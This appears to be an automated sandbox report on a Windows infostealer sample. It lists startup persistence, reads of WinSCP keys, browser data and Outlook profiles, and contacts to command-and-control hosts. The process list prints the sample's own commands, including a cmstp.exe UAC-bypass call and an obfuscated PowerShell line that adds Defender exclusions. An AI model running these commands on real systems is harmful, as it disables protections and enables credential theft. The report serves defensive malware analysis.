Analysis Overview
SHA256
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b
Threat Level: Shows suspicious behavior
The file 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Drops startup file
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Accesses Microsoft Outlook profiles
Drops file in System32 directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
outlook_win_path
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 23:55
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 23:55
Reported
2024-11-09 23:57
Platform
win7-20241010-en
Max time kernel
104s
Max time network
109s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"
\??\c:\windows\system32\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')
C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | poolfreshstep.com | udp |
| RU | 185.170.144.39:80 | poolfreshstep.com | tcp |
| US | 8.8.8.8:53 | fallback-01-static.com | udp |
| MY | 111.90.145.132:7708 | fallback-01-static.com | tcp |
| MY | 111.90.145.132:7708 | fallback-01-static.com | tcp |
| US | 8.8.8.8:53 | poolfreshstep.com | udp |
Files
memory/2220-0-0x000007FEF5F03000-0x000007FEF5F04000-memory.dmp
memory/2220-1-0x0000000000D00000-0x0000000000D0C000-memory.dmp
memory/2220-2-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-3-0x000000001B0C0000-0x000000001B1A0000-memory.dmp
memory/2220-4-0x000000001C760000-0x000000001CA42000-memory.dmp
C:\Users\Admin\A.inf
| MD5 | 961df7710c27cd2a2452c11aa48ada24 |
| SHA1 | 081694e0067918b8355efef2cf72ef52d82e44b0 |
| SHA256 | d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41 |
| SHA512 | 64f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae |
memory/2220-7-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-8-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-9-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-10-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-11-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-16-0x0000000000540000-0x000000000055C000-memory.dmp
memory/2220-19-0x0000000000360000-0x0000000000368000-memory.dmp
memory/3032-21-0x0000000002490000-0x0000000002498000-memory.dmp
memory/2220-20-0x000007FEF5F03000-0x000007FEF5F04000-memory.dmp
memory/3032-18-0x000000001B290000-0x000000001B572000-memory.dmp
memory/2220-17-0x000000001ABD0000-0x000000001AC18000-memory.dmp
memory/2220-22-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-23-0x000000001B330000-0x000000001B3D6000-memory.dmp
memory/2220-24-0x0000000000CC0000-0x0000000000CF4000-memory.dmp
memory/2220-25-0x000000001AC20000-0x000000001AC6A000-memory.dmp
memory/2220-26-0x0000000000B20000-0x0000000000B36000-memory.dmp
memory/2220-27-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2220-28-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe
| MD5 | d00a8f6a66f5fcaf18564b6f47831294 |
| SHA1 | d1ae07fd6267b53264f1764cc45aafbfe9f5f763 |
| SHA256 | a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039 |
| SHA512 | 99937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27 |
memory/2220-35-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp
memory/2900-36-0x0000000000B40000-0x0000000000BB0000-memory.dmp
memory/2900-37-0x0000000000BB0000-0x0000000000C4C000-memory.dmp
memory/2900-41-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-39-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-53-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-71-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-38-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-51-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-49-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-55-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-57-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-59-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-61-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-47-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-63-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-66-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-45-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-67-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-69-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-73-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-75-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-43-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-77-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-79-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-81-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-83-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-85-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-87-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-89-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-91-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-93-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-96-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-101-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-99-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-97-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/2900-2892-0x0000000000420000-0x000000000044C000-memory.dmp
memory/2900-2893-0x0000000002450000-0x000000000249C000-memory.dmp
memory/2900-2894-0x0000000004FC0000-0x00000000050B0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 23:55
Reported
2024-11-09 23:57
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
140s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe | N/A |
